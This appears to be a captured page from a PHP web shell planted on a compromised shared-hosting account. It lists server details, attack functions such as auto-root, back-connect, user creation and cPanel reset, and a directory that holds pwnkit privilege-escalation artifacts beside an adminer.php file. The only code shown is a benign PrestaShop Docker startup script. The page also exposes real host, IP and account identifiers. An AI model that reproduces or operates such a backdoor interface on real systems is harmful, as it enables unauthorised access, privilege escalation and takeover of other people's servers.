Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
.docker /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Dockerfile
255
B
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
docker_run_git.sh
3
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
wait-for-it.sh
3.98
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : docker_run_git.sh
#!/bin/sh if [ ! -f ./vendor/autoload.php ]; then echo "\n* Vendor autoloader not found, running composer ..."; runuser -g www-data -u www-data -- /usr/local/bin/composer install --no-interaction fi if [ "$DB_SERVER" = "<to be defined>" -a $PS_INSTALL_AUTO = 1 ]; then echo >&2 'error: You requested automatic PrestaShop installation but MySQL server address is not provided ' echo >&2 ' You need to specify DB_SERVER in order to proceed' exit 1 elif [ "$DB_SERVER" != "<to be defined>" -a $PS_INSTALL_AUTO = 1 ]; then RET=1 while [ $RET -ne 0 ]; do echo "\n* Checking if $DB_SERVER is available..." mysql -h $DB_SERVER -P $DB_PORT -u $DB_USER -p$DB_PASSWD -e "status" > /dev/null 2>&1 RET=$? if [ $RET -ne 0 ]; then echo "\n* Waiting for confirmation of MySQL service startup"; sleep 5 fi done echo "\n* DB server $DB_SERVER is available, let's continue !" fi # From now, stop at error set -e if [ ! -f ./config/settings.inc.php ]; then if [ $PS_INSTALL_AUTO = 1 ]; then echo "\n* Installing PrestaShop, this may take a while ..."; if [ $PS_ERASE_DB = 1 ]; then echo "\n* Drop & recreate mysql database..."; if [ $DB_PASSWD = "" ]; then echo "\n* Dropping existing database $DB_NAME..." mysql -h $DB_SERVER -P $DB_PORT -u $DB_USER -e "drop database if exists $DB_NAME;" echo "\n* Creating database $DB_NAME..." mysqladmin -h $DB_SERVER -P $DB_PORT -u $DB_USER create $DB_NAME --force; else echo "\n* Dropping existing database $DB_NAME..." mysql -h $DB_SERVER -P $DB_PORT -u $DB_USER -p$DB_PASSWD -e "drop database if exists $DB_NAME;" echo "\n* Creating database $DB_NAME..." mysqladmin -h $DB_SERVER -P $DB_PORT -u $DB_USER -p$DB_PASSWD create $DB_NAME --force; fi fi if [ "$PS_DOMAIN" = "<to be defined>" ]; then export PS_DOMAIN=$(hostname -i) fi echo "\n* Launching the installer script..." runuser -g www-data -u www-data -- php /var/www/html/$PS_FOLDER_INSTALL/index_cli.php \ --domain="$PS_DOMAIN" --db_server=$DB_SERVER:$DB_PORT --db_name="$DB_NAME" --db_user=$DB_USER \ --db_password=$DB_PASSWD --prefix="$DB_PREFIX" --firstname="John" --lastname="Doe" \ --password=$ADMIN_PASSWD --email="$ADMIN_MAIL" --language=$PS_LANGUAGE --country=$PS_COUNTRY \ --all_languages=$PS_ALL_LANGUAGES --newsletter=0 --send_email=0 --ssl=$PS_ENABLE_SSL if [ $? -ne 0 ]; then echo 'warning: PrestaShop installation failed.' fi fi else echo "\n* Pretashop Core already installed..."; fi if [ $PS_DEMO_MODE -ne 0 ]; then echo "\n* Enabling DEMO mode ..."; sed -ie "s/define('_PS_MODE_DEMO_', false);/define('_PS_MODE_DEMO_',\ true);/g" /var/www/html/config/defines.inc.php fi echo "\n* Almost ! Starting web server now\n"; exec apache2-foreground
Close